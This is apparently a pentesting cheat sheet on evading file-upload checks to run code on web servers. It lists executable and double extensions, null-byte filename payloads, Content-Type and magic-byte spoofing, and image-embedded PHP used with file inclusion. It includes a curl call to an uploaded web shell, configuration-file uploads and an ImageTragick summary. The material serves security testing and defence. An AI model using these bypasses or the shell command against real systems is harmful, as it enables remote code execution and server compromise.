Upload
Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially crafted filename or MIME type and execute arbitrary code on the server.
Summary
- Tools
- Exploits
PHP Extension
- .php
- .php3
- .php4
- .php5
- .php7
Less-known extensions
- .pht
- .phar
- .phpt
- .pgif
- .phtml
- .phtm
Double extensions
- .jpeg.php
- .jpg.php
- .png.php
Other extensions
- ASP: .asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)
- Perl: .pl, .pm, .cgi, .lib
- JSP: .jsp, .jspx, .jsw, .jsv, .jspf
- ColdFusion: .cfm, .cfml, .cfc, .dbm
Upload tricks
- Null byte (works well against pathinfo()): the extension check sees the trailing image extension, but the C-level file functions stop at the NUL and write the file as .php. PHP 5.3.4 and later reject paths that contain a null byte, so this only works against old interpreters or other back ends.
  - .php%00.gif
  - .php\x00.gif
  - .php%00.png
  - .php\x00.png
  - .php%00.jpg
  - .php\x00.jpg
- MIME type: change Content-Type: application/x-php or Content-Type: application/octet-stream in the file part to one of
  - Content-Type: image/gif
  - Content-Type: image/png
  - Content-Type: image/jpeg
- Magic bytes: some applications identify file types by their first signature bytes. Adding or replacing them at the start of the file (for example GIF89a; in front of the PHP code) may trick the check, since PHP simply echoes the bytes that precede the <?php tag.
Picture upload with LFI
Valid pictures hosting PHP code. Upload the picture and use a local file inclusion to execute the code. The shell can be called with the following command: curl 'http://localhost/test.php?0=system' --data "1='ls'"
- Picture Metadata: hide the payload inside a comment tag in the metadata. This survives signature and dimension checks but not re-encoding, which drops metadata.
- Picture Resize: hide the payload within the compressed image data itself so that it survives a resize, also defeating getimagesize() and imagecreatefromgif().
Configuration Files
Upload a server configuration file to change how the web server handles other files in the same directory, for example to have .jpg files executed as PHP.
- .htaccess (Apache)
- web.config (IIS)
- httpd.conf (BusyBox httpd)
- __init__.py (Python)
CVE - ImageTragick
ImageMagick (CVE-2016-3714) passed attacker-controlled parts of an MVG/SVG image, such as the URL in a fill directive, to a shell when fetching it, so a crafted image that the server converts or resizes executes commands. Typical payloads:
- HTTP Request
- Reverse Shell
- Touch command
References
- Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
- BookFresh Tricky File Upload Bypass to RCE - Ahmed Aboul-Ela, November 29, 2014
- Encoding Web Shells in PNG IDAT chunks - phil, 04-06-2012
- La PNG qui se prenait pour du PHP (The PNG that thought it was PHP) - 23 February 2014
- File Upload restrictions bypass - Haboob Team